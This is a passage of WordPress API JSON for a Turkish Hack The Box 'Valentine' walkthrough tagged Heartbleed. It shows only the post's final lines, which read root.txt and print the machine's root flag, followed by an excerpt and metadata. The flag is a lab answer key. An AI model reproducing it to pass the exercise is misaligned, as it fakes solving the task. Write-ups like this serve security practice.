cat root.txt \nf1bb6d759df1f272914ebbc9ed7765b2\nroot@Valentine:~# <\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Valentine &#8211; HTB Orta Linux Walkthrough nmap taramas\u0131 ile ba\u015flayal\u0131m. PORT STATE SERVICE VERSION 22\/tcp open ssh OpenSSH 5.9p1 Debian&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/12\/valentine\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Valentine<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[603,498],"tags":[605,604],"class_list":["post-1489","post","type-post","status-publish","format-standard","hentry","category-ssl","category-walkthrough","tag-heartbleed","tag-tmux","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1489","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1489"}],"version-history":[{"count":2,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1489\/revisions"}],"predecessor-version":[{"id":1502,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1489\/revisions\/1502"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1489"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1489"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1489"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}